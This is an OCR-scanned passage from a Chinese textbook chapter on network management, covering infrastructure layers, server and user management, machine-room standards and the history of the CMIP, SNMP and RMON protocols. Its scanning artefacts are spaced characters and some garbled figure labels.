现代 网 络 的 良性 运营 依赖 于 网 络 经 济 性 的 增长 ， 这 是 一 种 建立 在 互联 网 基础 上 的 生 
产 、 分 配 、 交 换 和 消费 的 经 济 关 系 。 在 经 济 形态 上 ， 它 以 信息 经 济 或 知识 经 济 为 主体 ， 以 
高 科技 为 支持 ， 与 传统 经 济 性 相 比 ， 网 络 经 济 具 有 以 下 显著 的 特征 : 快捷 性 、 高 渗透 性 、 
自我 膨胀 性 、 边 际 效益 递增 性 、 外 部 经 济 性 、 可 持续 性 和 直接 性 。 


2. 网 络 管理 的 基本 任务 


为 了 满足 网 络 经 营 者 和 用 户 对 网 络 的 上 述 要 求 ， 网 络 管理 必须 能 够 完成 以 下 任务 来 支 
撑 上 述 目标 的 实现 。 

1) ”状态 监测 

网 络 状 态 的 含义 非常 广泛 ， 既 包括 各 种 类 型 的 设备 运转 状态 ， 如 链 路 流量 、CPU 和 
内 存 利 用 率 、 负 载 压力 、IO 读 取 效率 等 ， 也 包括 网 络 的 一 般 状 态 ， 如 安全 状态 、 可 靠 状 
态 、 计 费 状 态 等 ， 状 态 监 测 是 网 络 管理 的 基础 ， 通 过 状态 监测 可 以 获取 网 络 各 种 性 能 的 原 
始 数据 ， 分 析 过 去 和 当前 网 络 运行 的 状况 ， 并 有 利于 对 未 来 网 络 的 发 展 和 投资 做 出 预 判 。 

2) ”数据 收集 和 分 析 

除了 对 设备 的 状态 进行 监测 外 ， 要 想 深入 了 解 网 络 的 运行 情况 ， 还 要 将 分 散 监测 到 的 
各 种 运行 数据 收集 到 一 起 进行 分 析 和 处 理 。 数 据 收集 是 网 络 管理 中 的 一 项 非常 重要 的 任 
务 ， 也 是 大 型 网 络 运 维 管理 的 根本 。 

3) ”状态 控制 

根据 对 网 络 状态 的 监测 、 数 据 收集 和 分 析 的 结果 ， 应 能 对 网 络 采取 有 效 的 控制 措施 ， 
如 隔离 故障 设备 、 控 制 网 络 拥塞 、 调 整 计 费 策略 等 。 


10.1.2 ”网 络 管理 的 基本 范畴 


早期 网 络 管理 的 对 象 一 般 包 括 路 由 器 、 交 换 机 和 计算 机 等 ， 但 随 着 互联 网 的 发 展 ， 网 
络 管理 对 象 逐步 扩大 化 ， 几 乎 包含 了 网 络 中 的 所 有 实体 和 软件 系统 ， 以 及 供电 等 辅助 设 
备 。 目 前 网 络 管理 的 基本 范畴 可 分 为 以 下 几 类 。 


1. 网 络 基础 设施 管理 


网 络 基础 设施 主要 包括 骨干 网 络 、 汇 聚 网 络 、 接 入 网 络 、 外 部 网 络 连 接 和 网 络 管理 五 
大 组 成 部 分 ， 其 中 汇聚 网 络 只 在 三 层 架构 网 络 中 起 作用 ,但 所 有 网 络 基本 都 包含 了 骨干 网 
络 、 接 入 网 络 、 外 部 网 络 连接 和 网 络 管理 四 大 组 成 要 素 ， 如 图 10-1 所 示 。 

1) 上 骨干 网 络 

骨干 网 络 是 整个 网 络 体系 中 的 核心 转发 展 ， 在 局 域 网 中 一 般 由 三 层 核心 交换 机 组 成 ， 
主要 完成 数据 的 高 速 转发 、 路 由 、 安 全 交换 ， 其 中 数据 交换 能 力 是 衡量 其 设备 性 能 的 最 关 
键 技术 指标 之 一 。 一 般 情况 ， 当 前 骨干 网 的 功能 设计 主要 有 以 下 几 点 : 

e@ ”高 速 无 阻塞 的 IP 数据 转发 ， 具 备 承受 病毒 、 攻 击 等 突 发 数据 流 的 能 力 ; 

@ ”完成 路 由 选择 及 负载 均衡 分 担 ; 

@ 支持 IPv4/IPv6 双 协 议 栈 ; 
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@ 核心 间 、 核 心 与 汇聚 间 万 兆 元 余 互 连 ; 

e “采用 引擎 和 交换 矩阵 完全 物理 分 离 并 各 自 元 余 的 方式 ， 保 证 高 可 靠 性 ; 

e@ ”采用 虚拟 化 技术 或 备份 技术 实现 将 核心 设备 的 元 余 和 负载 均衡 ， 减 少 路 由 收敛 时 
间或 路 由 振荡 ， 通 过 跨 设备 的 链 路 聚合 ， 实 现 多 链 路 的 完全 负载 均衡 。 


CL 互联 网 J 
— N 
E 加 
防火 墙 。 出口 三 层 J= 
Ed - 2 


计 费 网关 “想必 交换 。 防火 墙 


图 10-1 网 络 基础 设施 结构 示意 图 


管理 骨干 网 络 时 需要 重点 考虑 两 个 方面 的 问题 : 一 是 数据 转发 性 能 ， 二 是 骨干 网 络 的 
可 靠 性 。 其 中 可 靠 性 一 方面 包括 设备 本 身 应 具有 较 高 的 可 靠 性 ， 例 如 实现 引擎 、 风 扇 、 电 
源 的 元 余 设 计 和 自动 切换 ， 以 及 设备 对 恶劣 环境 的 承受 能 力 等 ; 另 一 方面 也 包括 网 络 拓扑 
的 元 余 设 计 ， 包 括 设备 和 链 路 的 元 余 设计 、 硬 件 虚拟 化 技术 和 负载 均衡 等 。 

2) 汇聚 网 络 

汇聚 网 络 层 一 般 只 出 现在 三 层 架 构 的 网 络 中 ， 而 传统 二 层 网 络 内 部 仅 由 骨干 层 和 接 入 
层 组 成 。 汇 聚 层 设备 主要 负责 连接 接 入 层 节点 和 核心 层 中 心 ， 汇 集 分 散 的 接 入 点 ， 扩 大 核 
心 层 设备 的 端口 密度 和 种 类 ， 汇 聚 各 区 域 数 据 流 量 ， 实 现 骨干 网 络 之 间 的 优化 传输 。 汇 聚 
交换 机 还 负责 本 区 域内 的 数据 交换 ， 汇 聚 交换 机 功能 与 核心 交换 机 功能 大 致 相同 ， 仍 需要 
较 高 的 性 能 和 比较 丰富 的 功能 ， 提 供 万 兆 上 行 、 千 兆 下 联 。 

汇聚 网 络 在 三 层 架 构 网 络 中 起 到 了 数据 分 发 、 隔 离 故障 的 作用 ， 通 常 汇聚 网 络 和 骨干 
网 络 之 间 通 过 路 由 进行 数据 转发 ， 因 此 对 汇聚 网 络 的 管理 出 了 重点 考虑 数据 转发 性 能 和 可 
靠 性 外 ， 还 要 关注 其 路 由 信息 的 管理 。 
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3)” 接 入 网 络 

接 入 网 络 直接 面向 终端 用 户 ， 在 网 络 结构 的 最 底层 ， 因 此 其 结构 和 类 型 也 相对 较 复 
杂 ， 它 的 设计 与 具体 接 入 用 户 的 地 理 位 置 和 规模 等 有 关 ， 对 传输 网 络 的 要 求 也 不 同 ， 一 般 
来 说 一 个 综合 型 网 络 要 求 能 够 支持 多 种 不 同 的 接 入 方式 ， 并 保证 传输 数据 的 安全 ， 从 接 入 
方式 的 种 类 来 看 ， 可 以 主要 分 为 以 下 三 类 。 

(1) 局 域 网 接 入 方式 ， 这 种 方式 适合 接 入 用 户 与 骨干 网 位 于 较 近 的 地 理 位 置 ， 处 于 同 
一 局 域 网 内 ， 它 的 优点 是 上 行 带宽 充足 、 成 本 低 、 传 输 性 能 好 。 

(2) 专线 接 入 方式 ， 其 基本 方式 是 进行 每 个 层次 之 间 的 专线 连接 ， 实 现 星 型 结构 的 全 
局 网 络 拓扑 ， 这 种 接 入 方式 适合 终端 用 户 与 骨干 网 距离 较 远 的 情况 ， 且 要 求 带宽 固定 且 具 
有 保障 性 ， 其 缺点 在 于 设计 不 灵活 和 费用 过 高 。 

(3) VPN 接 入 方式 ， 这 种 方式 是 利用 公共 网 络 来 构建 用 户 内 部 的 虚拟 私有 网 ， 一 般 
适合 远程 移动 的 办 公 人 员 使 用 或 小 规模 的 远程 接 入 用 户 。 因 为 一 般 构 建 VPN 的 公共 网 络 
都 是 借助 Internet 来 实现 的 ， 因 此 VPN 方式 的 接 入 带宽 会 受到 Intemet 带宽 使 用 的 限制 和 
影响 ， 但 其 优点 是 接 入 成 本 低廉 、 组 网 方式 灵活 。 目 前 主流 的 VPN 技术 分 为 三 种 IPSec 
VPN、SSL VPN 和 MPLS VPN， 对 VPN 接 入 网 进行 网 络 管理 除了 需要 关注 其 连接 性 能 和 
费用 情况 外 ， 还 需要 关注 用 户 及 其 权限 管理 和 私有 数据 的 安全 性 等 问题 。 

4) ”外 部 网 络 连接 

外 部 网 络 连接 一 般 指 用 户 网 络 与 Intemet 网 之 间 的 连接 网 络 ， 在 这 部 分 网 络 中 一 般 包 
含 防火 墙 、 计 费 系统 、 过 滤 系 统 、 路 由 器 等 设备 ， 通 常 外 部 网 络 是 整个 网 络 的 一 个 性 能 瓶 
颈 ， 也 是 内 外 网 隔离 的 一 个 关键 安全 地 带 ， 因 此 其 网 络 管理 任务 除了 需要 重点 关注 带宽 的 
利用 率 、 数 据 转 发 性 能 和 可 靠 性 外 ， 还 需要 关注 网 络 通信 行为 的 记录 、 网 络 安全 性 和 
Internet 线路 的 租用 等 问题 。 

5) ”网 络 管理 

随 着 网 络 的 发 展 和 变化 ， 网 络 管理 的 方式 从 早期 的 人 工 方式 转变 为 人 工 和 自动 组 合 的 
管理 方式 ， 网 络 管理 的 理念 和 手段 不 断 翻新 和 扩展 。 对 于 现代 一 些 大 型 网 络 ， 传 统 的 集中 
式 管理 网 络 已 不 能 再 适应 网 络 的 复杂 性 管理 需求 ， 因 此 分 布 式 管理 方式 和 凌驾 于 综合 型 网 
络 之 上 的 专用 管理 网 应 运 而 生 。 一 般 来 说 ， 专 用 管理 网 络 与 业务 网 相 比 ， 独 立 性 强 ， 主 要 
承担 网 络 管理 信息 流 的 转发 任务 ， 其 安全 性 和 可 靠 性 都 很 高 。 


2. 服务 器 和 操作 系统 管理 


通常 服务 器 在 整个 网 络 中 主要 承担 资源 集中 分 发 的 任务 ， 因 此 对 其 性 能 和 安全 的 监控 
尤为 重要 。 一 般 网 络 管理 都 需要 对 服务 器 的 工作 运行 方式 、 硬 件 维护 、 性 能 维护 、 操 作 系 
统 及 其 不 同 层级 的 软件 维护 和 升级 进行 管理 ， 通 过 对 服务 器 关键 部 件 如 CPU、 内 存 、 硬 
盘 、 网 络 等 使 用 情况 和 性 能 表现 的 统计 ， 进 而 评估 用 户 下 一 阶段 对 资源 建设 和 服务 器 建设 
的 发 展 方向 和 升级 策略 。 

因此 在 对 服务 器 和 操作 系统 等 管理 过 程 中 ， 需 要 及 时 掌握 其 配置 情况 和 配置 参数 的 变 
化 ， 实 时 监控 系统 的 运转 情况 ， 及 时 发 现 故障 征兆 并 进行 处 理 ， 随 着 业务 发 展 和 用 户 需求 
的 不 断 变化 ， 还 需要 及 时 动态 调整 系统 的 配置 参数 ， 优 化 服务 系统 性 能 。 另 外 ， 对 服务 器 
的 集群 管理 、 容 灾 管 理 、 虚 拟 化 管理 和 热 备份 管理 也 是 当前 网 络 管理 的 研究 热点 ， 其 中 服 


338 网 络 安全 与 管理 


务 器 的 集群 管理 是 未 来 大 规模 服务 器 拓展 的 必然 发 展 趋势 。 

一 般 服 务 器 的 集群 管理 都 要 求 能 够 对 集群 中 各 个 节点 进行 有 效 监控 ， 并 能 实时 反映 各 
节点 包含 设备 资源 使 用 情况 、 关 键 部 位 温度 、 系 统 压力 等 工作 状态 ， 同 时 可 以 部 署 各 种 管 
理 软件 进行 设备 管理 。 当 前 对 集群 管理 结构 的 设计 一 般 都 要 求 采用 模块 化 设计 ， 并 提供 机 
群 快 速 部 署 、 系 统 级 恢复 、 综 合 监控 管理 、 统 一 告警 平台 和 统计 报表 等 功能 ， 另 外 其 状态 
监控 模块 要 求 支持 的 各 类 视图 也 非常 丰富 ， 例 如 显示 物理 机 柜 视图 、 网 络 拓扑 视图 、 性 能 
分 析 视 图 、 应 用 监控 视图 、 告 警 管理 模块 (可 以 实现 实时 告警 管理 、 历 史 告警 管理 、 告 警 
统计 报表 、 告 警 关联 分 析 等 功能 )， 图 10-2 描述 了 典型 的 一 种 服务 器 集群 结构 。 同 时 ， 一 
般 的 集群 管理 模块 都 要 求 可 以 实现 集群 网 络 和 服务 、 集 群 用 户 和 进程 、 集 群 文件 和 关机 功 
能 ， 集 群 部 署 模块 要 求 可 以 实现 点 到 点 部 署 、 镜 像 管理 等 功能 。 


管理 服务 器 


管理 模块 | | |_ 千 内 模块 


HS 


10-2 ”服务 器 集群 结构 示意 图 
3. 数据 安全 和 容 灾 管 理 


当前 网 络 数据 安全 是 一 个 非常 复杂 的 系统 性 问题 ， 它 涉及 网 络 中 各 类 软 硬 件 以 及 运行 
环境 的 安全 ， 涉 及 一 系列 计算 机 犯罪 、 计 算 机 病毒 和 不 良 信息 等 社会 性 问题 ， 硬 件 损坏 、 
软件 错误 、 通 信 故 障 、 病 毒 感染 、 电 磁 辐 射 、 非 法 存 取 、 管 理 不 当 、 自 然 灾害 、 人 员 犯 罪 
等 情况 都 可 能 威胁 到 网 络 数 据 安全 ， 因 此 网 络 管理 应 从 多 种 角度 ， 结 合 多 种 技术 保障 网 络 
系统 中 的 数据 安全 ， 常 用 的 方法 主要 有 以 下 几 种 。 

(1) 加 强 存 取 控制 ， 防 止 非 授权 访问 。 这 样 既 可 防止 合法 用 户 有 意 或 无 意 的 越权 访 
问 ， 也 可 防止 非法 用 户 的 入 侵 。 
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(2) 加 密 保障 ， 通 常 分 为 对 数据 的 加 密 和 对 网 络 传输 的 加 密 ， 对 于 后 者 ， 主 要 是 针对 
链 路 、 节 点 和 点 对 点 的 传输 加 密 。 

(3) 数据 备份 ， 防 止 数据 因 意 外 情况 或 人 为 失误 造成 数据 丢失 或 损坏 等 情况 ， 有 效 、 
安全 、 适 时 的 数据 备份 是 网 络 管理 中 的 一 项 重要 任务 。 

(4) 数据 的 容 灾 恢复 ， 通 过 建设 分 布 式 存储 系统 ， 构 建 虚拟 存储 池 ， 实 现存 储 资源 的 
统一 管理 和 按 需 分 配 。 建 立 远程 存储 备份 机 制 ， 可 以 有 效 提高 网 络 中 关键 业务 数据 的 远程 
容 灾 能 力 ， 切 实 保障 数据 的 安全 。 其 中 存储 系统 的 安全 可 靠 运行 是 整个 容 灾 系 统 的 基础 。 


4. 用 户 管理 


网 络 用 户 管理 在 网 络 管理 中 非常 重要 ， 特 别 是 针对 用 户 管理 的 身份 认证 机 制 是 系统 安 
全 中 最 重要 的 问题 之 一 ， 网 络 中 有 关 用 户 的 管理 通常 有 以 下 几 种 常见 任务 。 

1) ”用 户 的 开户 与 销 户 

当 网 络 中 需要 通过 某 种 认证 方式 来 获取 资源 或 访问 权限 时 ， 通 常 都 会 采用 用 户 管 理 这 
一 方式 ， 通 过 对 用 户 进行 身份 权限 的 检查 来 允许 或 禁止 一 个 用 户 对 网 络 的 访问 。 

2) 用户 组 策略 管理 

在 整个 网 络 中 ， 用 户 和 用 户 组 的 管理 是 密 不 可 分 的 ， 通 常 为 了 方便 管理 用 户 及 其 权限 
配置 ， 同 时 也 为 了 能 有 效 减 少 在 权限 设置 时 人 为 失误 的 风险 ， 可 以 将 用 户 配置 在 各 类 用 户 
组 中 ， 通 常用 户 会 默认 继承 该 用 户 组 的 权限 ， 但 有 时 也 可 以 为 某 个 用 户 赋予 特殊 的 权限 。 

3) ”用 户 对 服务 和 资源 的 使 用 权限 管理 和 配额 管理 

当 网 络 中 的 资源 仅 允 许 授权 用 户 访问 时 ， 需 要 设置 对 资源 访问 的 权限 策略 ， 同 时 为 了 
避免 资源 的 滥用 ， 也 可 以 为 用 户 配置 一 定 的 资源 使 用 配额 。 

4) 用户 计 费 管理 

计 费 管理 通常 是 用 户 管理 中 的 一 个 重要 子 集 ， 计 费 管理 能 够 提供 测量 用 户 网 络 业务 的 
使 用 量 ， 并 能 汇总 、 计 算 和 开 列 使 用 费用 的 一 组 管理 功能 。 


5. 机 房 及 辅助 设施 管理 


机 房 是 计算 机 网 络 系统 的 中 枢 ， 因 此 机 房 建设 直接 影响 着 整个 网 络 的 安全 稳定 运行 。 
由 于 计算 机 机 房 的 环境 必须 满足 各 种 电子 设备 和 工作 人 员 对 温度 、 湿 度 、 洁 净 度 、 电 磁场 
强度 、 噪 音 干 扰 、 安 全 保安 、 防 漏 、 电 源 质量 、 振 动 、 防 雷 和 接地 等 要 求 。 一 个 合格 的 现 
代 化 计算 机 机 房 ， 应 该 是 一 个 安全 可 靠 、 舒 适 实用 、 节 能 高 效 和 具有 可 扩充 性 的 机 房 。 

1) ”机 房 建设 和 管理 标准 

机 房 工 程 的 建设 和 管理 涉及 内 容 多 且 广 ， 有 专 有 的 规范 标准 ， 也 有 通用 的 规范 标准 ， 
常用 的 标准 和 规范 如 下 : 

e@ GB 2887 一 89 《计算 站 场地 技术 要 求 》 
GB 9361 一 88 《计算 站 场地 安全 要 求 》 
GB 50174 一 93 《电子 计算 机 机 房 设 计 规 范 》 
GB 6650 一 86 《计算 机 房 活 动 地 板 技术 条 件 》 
GB 50243 一 97 《通风 与 空调 工程 施工 与 验收 规范 》 
GB 50054 一 95 《低压 配 电 设计 规范 》 
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e@ JGJT16 一 92 《民用 建筑 电气 设计 规范 》 

e@ GB 50057 一 94 《建筑 物 防 雷 设计 规范 》 

@ EIA/TIA 607 《民用 建筑 通信 接地 标准 》 

e@ GB 50222 一 95 《建筑 内 部 装修 设计 防火 规范 》 

e GB 16 一 87 《建筑 设计 防火 规范 》 

e@ GB 50222 一 95 《建筑 内 部 装修 设计 防火 规范 》 

@ SJ/T30003 一 93 《电子 计算 机 机 房 施工 及 验收 规范 》 

@ ISO/IEC 11801 《国际 综合 布线 信道 标准 》 

e@ TIAEIA 568B 《北美 综合 布线 标准 》 

@ TIA/EIA 569 《北美 建筑 通信 线路 间距 标准 》 

@ TIA/EIA TSB67 《布线 测试 标准 》 

e EMC 《欧洲 电磁 兼容 性 标准 》 

表 10-1 列 出 了 对 网 络 核心 机 房 的 一 般 环境 要 求 。 

表 10-1 机 房 环境 要 求 

项 目 环境 指标 
温度 20~25C 
湿度 45%~65% 
温度 变化 率 <5'C/ 时 ， 不 得 结 露 
新 风量 新 风量 供给 按 每 人 每 小 时 不 小 于 40 立方 米 或 室内 总 送 风量 的 5% 
尘埃 三 18 000 粒 /cn 
噪音 主 操作 员 位 置 入 65dBA 
照度 机 房 300 一 500Lux， 应 急 三 5 Lux, 
直流 工作 接地 和 19， 接 地 地 位 差 和 1V 
交流 工作 交流 工作 接地 系统 接地 电阻 ，<4Q、 零 地 电压 <1V 
安全 保护 计算 机 系统 安全 保护 接地 电阻 及 静电 接地 电阻 :<4Q 
电源 频率 电源 频率 : (50 土 0.2)Hz、 电 源 电压 : (380/220 土 5)V 
防 雷 保护 防 雷 保护 接地 系统 接地 电阻 ，<10Q 


2) 


机 房 电 气 系统 技术 要 求 


机 房 内 市 电 负 荷 主 要 为 专用 空调 机 、 新 风机 、 照 明 系 统 、 市 电 插座 、UPS 系统 等 ， 
UPS 负荷 主要 为 小 型 机 、PC 服务 器 、 阵 列 库 、 网 络 设备 等 。 

其 中 机 房 的 供电 电源 技术 指标 应 按 GB 2887 一 2000《 电 子 计算 机 场地 通用 规范 》 中 的 
规定 按 A 级 执行 。 同 时 考虑 到 计算 机 等 电子 系统 的 扩展 、 升 级 等 可 能 性 ， 预 留 备 用 容 
量 。 机 房 的 供电 系统 采用 三 相 五 线 制 供电 。 机 房 内 通常 配置 总 配 电 柜 和 UPS 配 电 柜 ， 配 
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置 220V 和 380V 两 种 供电 模式 。 每 一 路 机 柜 电源 设置 单独 电源 开关 。 电 源 箱 ( 柜 ) 内 应 采用 
高 质量 的 品牌 空气 开关 ， 并 加 有 保护 装置 ， 以 保护 操作 人 员 的 安全 。 各 功能 区 均 应 设置 设 
备 维修 插座 (220V 市 电 供电 )。 

机 房 内 的 不 间断 电源 UPS 应 为 计算 机 设备 、 监 控 设 备 及 事故 照明 等 提供 负载 均衡 合 
理 配 电 。 配 电 系统 应 设置 和 消防 系统 的 联动 装置 ， 可 在 发 生火 灾 时 自动 切断 动力 供电 和 
UPS 输入 输出 供电 。 每 个 UPS 电源 插座 箱 和 防水 插座 ， 均 采用 独立 回路 供电 ; 并 且 每 一 
个 回路 有 单独 的 漏电 保护 开关 。 全 部 电线 须 采 用 符合 国家 标准 的 阻 燃 双 塑 型 铜 芯 电 线 ， 相 
线 、 零 线 和 地 线 颜 色 须 按 国家 标准 分 清 ， 并 对 所 有 敷设 的 线路 做 好 标记 。UPS 系统 应 保障 
计算 机 系统 7*24 小 时 全 天 候 正常 运行 ， 避 免 在 市 电 突然 断 电 的 情况 下 造成 系统 数据 的 丢 
失 和 设备 的 损坏 。 

3) ”机 房 防 雷 与 接地 系统 技术 要 求 

机 房 安全 接地 应 符合 GB 2887 一 2000《 电 子 计算 机 场地 通用 规范 》 中 的 规定 。 接 地 与 
防 雷 接地 。 按 照 GB 50343 一 2004《 建 筑 物 电子 信息 系统 防 雷 技术 规范 》 作 好 防 雷 措施 ， 
防 雷 装置 分 为 二 级 。 至 少 在 总 电源 进 线 处 安装 一 级 电源 防 雷 (100kA) 和 UPS 电源 进 线 处 、 
网 络 信号 线 进 线 处 安装 二 级 电源 防 雷 (40kA)。 两 级 防 雷 器 之 间 须 有 退 耦 措施 。 在 电子 计算 
机 系统 中 ， 有 大 量 的 使 用 380/220V 交流 电源 的 电气 设备 ， 这 些 设备 按 国家 有 关 规 范 中 对 
电气 的 规定 进行 工作 接地 ， 即 把 中 性 点 接地 。 同 时 做 好 安全 保护 地 ， 要 求 接地 电阻 乏 
1Q9。 此 外 ， 要 求 空调 机 组 、 机 柜 等 机 房 设备 必须 接地 ， 各 类 设备 的 接地 电阻 按照 国家 标 
准 执行 。 如 果 采 用 联合 接地 的 方式 ， 则 要 求 以 最 高 标准 执行 。 

接地 装置 的 设置 应 满足 人 身 的 安全 及 计算 机 正常 运行 和 系统 设备 的 安全 要 求 。 地 线 系 
统 ， 直流 工作 接地 硅 19、 交 流 工作 接地 夺 4Q 安 全 保护 接地 硅 4Q9。 具 体 技术 要 求 应 参照 
GB 50174 一 93《 电 子 计 算 机 机 房 设计 规范 》、GB 2887 一 2000《 电 子 计算 机 场地 通用 规 
范 》 和 GB 50343 一 2004《 建 筑 物 电 子 信 息 系统 防 雷 技 术 规 范 》 的 规定 ， 符 合 技 术 指 标 中 
的 有 关 要 求 ， 有 特殊 要 求 的 设备 进行 特殊 处 理 。 


10.1.3 网络 管理 协议 的 发 展 历史 


网 络 管理 协议 是 网 络 管理 中 最 重要 的 技术 标准 部 分 ， 它 定义 了 网 络 管理 系统 与 被 管理 
设备 之 间 的 通信 方法 和 规则 。 在 网 络 管理 协议 产生 之 前 的 很 长 时 间 里 ， 网 络 管理 者 要 学 习 
从 各 种 不 同 的 设备 中 获取 数据 的 方法 ， 但 由 于 各 个 设备 生产 商都 使 用 了 自己 私有 的 方法 来 
收集 数据 ， 因 此 不 同 生产 商 所 提供 的 数据 采集 方法 大 相 径 庭 ， 使 网 络 管理 任务 非常 繁重 。 
并 且 每 当 一 个 新 设备 被 开发 出 来 ， 都 需要 对 其 数据 采集 方法 进行 二 次 开发 和 整合 ， 针 对 设 
备 的 网 络 管理 协议 的 行业 标准 制定 势 在 必 行 。 

在 国际 上 ， 首 先 开 始 研究 网 络 管理 通信 标准 的 是 著名 的 国际 标准 化 组 织 ISO， 他们 从 
1979 年 开始 研究 网 络 管理 的 协议 标准 化 工作 ， 主 要 针对 的 是 OSI 七 层 协议 标准 制定 的 ， 
其 主要 成 果 是 CMIS( 公 共管 理 信息 服务 ) 和 CMIP( 公 共管 理 信息 协议 )。CMIS 支持 管理 进 
程 和 管理 代理 之 间 的 通信 需求 ，CMIP 则 是 提供 一 种 用 于 管理 信息 传输 服务 的 应 用 层 协 
议 ，CMIS 和 CMIP 规定 了 OSI 系统 的 网 络 管理 标准 ， 典 型 的 代表 产品 有 AT&T 的 
Accumaster 和 DEC 公司 的 EMA 等 ， 另 外 HP 的 OpenView 最 初 也 是 按 OSI 标准 设计 的 。 

随 着 Internet 业务 和 规模 呈 几 何 级 数 的 增长 ，Internet 工程 任务 组 (IETF) 为 了 更 好 地 管 
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理 互 联网 ， 决 定 采用 基于 OSI 的 CMIP 协议 作为 nternet 的 管理 协议 ， 并 对 它 进行 了 修 
改 ， 修 改 后 的 协议 被 称 作 CMOT(Common Management OverTCP/IP)。 但 由 于 CMOT 人 迟 迟 
未 能 出 台 ，IETF 决定 把 已 有 的 SGMP( 简 单 网 关 监 控 协 议 ) 做 进一步 修改 后 ， 当 做 临时 的 解 
决 方案 来 使 用 。 这 个 在 SGMP 基础 上 开发 的 解决 方案 就 是 后 来 著名 的 SNMP( 简 单 网 络 管 
理 协议 )， 也 称 SNMPv1。 

SNMPv1 协议 最 大 的 特点 是 简单 、 易 于 实现 和 成 本 低廉 ， 另 外 它 还 有 较 大 的 可 伸缩 
性 ， 可 管理 绝 大 部 分 符合 Intemet 标准 的 设备 ， 通 过 定义 新 的 “被 管理 对 象 ”， 可 以 非常 
方便 地 扩展 其 管理 能 力 ， 并 且 当 被 管理 设备 发 生 严重 错误 时 ， 也 不 会 影响 管理 者 的 正常 工 
作 ， 因 此 也 具有 良好 的 健壮 性 。 

SNMP 发 展 迅速 ， 已 经 超越 了 传统 的 TCP/IP 环境 ， 受 到 了 更 为 广泛 的 支持 ， 已 经 成 
为 网 络 管理 方面 事实 上 的 标准 。 支 持 SNMP 的 产品 中 ， 典 型 的 有 IBM 公司 的 NetView、 
Cabletron 公司 的 Spectrum 和 HP 公司 的 OpenView。 除 此 之 外 ， 许 多 其 他 生产 网 络 通信 设 
备 的 厂家 ， 如 Cisco、Crosscomm、Proteon、Hughes 等 也 都 提供 了 基于 SNMP 的 实现 
方法 。 

早期 的 SNMP 协议 开发 如 同 TCP/IP 协议 族 一 样 ， 没 有 将 安全 问题 纳入 制定 范畴 中 ， 
为 此 许多 用 户 和 厂商 提出 了 修改 SNMPv1 协议 的 建议 ， 为 其 增加 安全 机 制 的 保障 。IETF 
在 1992 年 开始 了 SNMPv2 版 本 的 开发 工作 ， 将 对 提高 安全 性 和 更 有 效 地 传递 管理 信息 方 
面 加 以 改进 ， 具 体 包括 提供 加 密 验 证 、 时 间 同 步 机 制 以 及 提供 GETBULK 操作 一 次 取 回 
大 量 数据 的 能 力 等 。1997 年 4 月 ，IETF 成 立 了 SNMPv3 工作 组 ，SNMPv3 的 重点 是 安 
全 、 可 管理 的 体系 结构 和 远程 配置 。 目 前 SNMPv3 已 经 成 为 IETF 建议 使 用 的 标准 ， 并 得 
到 了 供应 商 们 的 强 有 力 支持 。 

目前 ， 网 络 管理 技术 新 的 趋势 是 使 用 RMON( 远 程 网 络 监控 ) 和 基于 WEB 的 网 络 管理 
技术 。RMON 的 目标 是 为 了 扩展 SNMP 的 MIB-II( 管 理 信息 库 )， 使 SNMP 更 为 有 效 、 更 
为 积极 主动 地 监控 远程 设备 。RMON MIB 是 由 一 组 统计 数据 、 分 析 数 据 和 诊断 数据 构成 
的 数据 库 ， 利 用 许多 供应 商 生产 的 标准 工具 都 可 以 显示 出 这 些 数据 ， 因 而 它 具 有 独立 于 供 
应 商 设备 的 远程 网 络 分 析 功 能 。 并 且 RMON 探测 器 和 RMON 客户 机 软件 结合 在 一 起 ， 可 
在 网 络 环境 中 实施 RMON。RMON 的 监控 功能 是 否 有 效 ， 关 键 在 于 其 探测 器 要 具有 存储 
统计 数据 历史 的 能 力 ， 这 样 就 不 需要 不 停 地 轮 询 才 能 生成 一 个 有 关 网 络 运行 状况 趋势 的 视 
图 。 当 一 个 探测 器 发 现 一 个 网 段 处 于 一 种 不 正常 状态 时 ， 它 会 主动 与 网 络 管理 控制 台 的 
RMON 客户 应 用 程序 联系 ， 并 描述 不 正常 状况 的 捕获 信息 转发 。 基 于 WEB 的 网 络 管理 技 
术 将 网 络 管理 和 Web 技术 有 机 地 结合 起 来 ， 其 根本 出 发 点 是 允许 通过 Web 浏览 器 进行 网 
络 管理 。 

目前 ， 基 于 Web 的 网 络 管理 模式 主要 有 两 种 实现 方式 。 一 种 方式 是 使 用 代理 技术 ， 
即 在 一 个 内 部 工作 站 上 运行 Web 服务 器 (代理 )， 由 这 个 工作 站 轮流 与 端点 设备 通信 ， 而 浏 
览 器 用 户 仅 与 代理 进行 通信 ， 同 时 代理 与 端点 设备 之 间 进 行 通信 。 在 这 种 方式 下 ， 网 络 管 
理 软件 成 为 操作 系统 上 的 一 个 应 用 ， 它 介 于 浏览 器 和 网 络 设备 之 间 。 在 管理 过 程 中 ， 网 络 
管理 软件 负责 将 收集 到 的 网 络 信息 传送 到 浏览 器 ， 并 将 SNMP 管理 协议 转换 成 Web 协议 
内 容 。 另 一 种 实现 方式 是 利用 嵌入 式 技术 ， 将 Web 功能 嵌入 到 网 络 设备 中 ， 每 个 设备 有 
自己 的 Web 管理 入 口 ， 管 理 员 可 通过 浏览 器 直接 访问 并 管理 该 设备 。 在 这 种 方式 下 ， 网 
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络 管理 软件 与 网 络 设备 集成 在 一 起 ， 网 络 管理 软件 无 须 完成 协议 转换 ， 就 可 以 使 所 有 的 管 
理 信息 通过 HTTP 协议 传送 。 


10.2 ”网 络 管理 系统 模型 


近年 来 随 着 网 络 技术 的 高 速 发 展 ， 计 算 机 网 络 在 金融 、 商 业 、 交 通 、 通 信 、 制 造 业 、 
服务 业 等 社会 生活 的 各 个 领域 都 发 挥 着 越 来 越 重 要 的 作用 。 计 算 机 网 络 的 稳定 和 可 靠 运 
行 ， 已 经 成 为 信息 时 代 的 一 种 基本 保障 ， 当 前 网 络 对 网 管 的 依赖 性 也 越 来 越 大 。 特 别 是 当 
电视 、 电 信 、 计 算 机 三 网 合 一 已 经 成 为 大 势 所 趋 ， 网 络 必 将 深入 人 们 的 生活 ， 网 络 管理 系 
统 已 经 成 为 网 络 社会 的 决定 性 技术 之 一 。 


10.2.1 网 络 管理 系统 模型 设计 的 目标 
1. 对 各 类 设备 的 集中 管理 


现代 网 络 中 设备 类 型 和 品牌 越 来 越 多 ， 例 如 路 由 器 、 以 太 网 交换 机 、ATM 设备 、 宽 
带 接 入 设备 、 窄 带 接 入 服务 器 等 ， 传 统 的 管理 方式 往往 是 针对 每 种 类 型 的 设备 单独 开发 专 
